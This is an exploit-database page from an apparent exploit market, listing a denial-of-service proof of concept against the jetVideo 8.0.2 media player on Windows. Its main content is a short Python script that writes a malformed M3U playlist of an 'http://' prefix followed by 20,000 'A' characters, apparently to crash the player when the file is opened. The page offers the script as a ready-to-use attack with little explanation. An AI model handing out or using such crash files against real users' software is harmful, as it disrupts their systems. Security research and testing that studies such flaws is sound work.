[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

jetVideo 8.0.2 Denial of Service

Author
Senator of Pirates
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17516
Category
dos / poc
Date add
10-02-2012
Platform
windows
# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [Senator.of.Pirates.team@gmail.com]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]
header = "http://"
junk = "A" * 20000
payload = (header+junk)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()
            


#  0day.today [2024-11-15]  #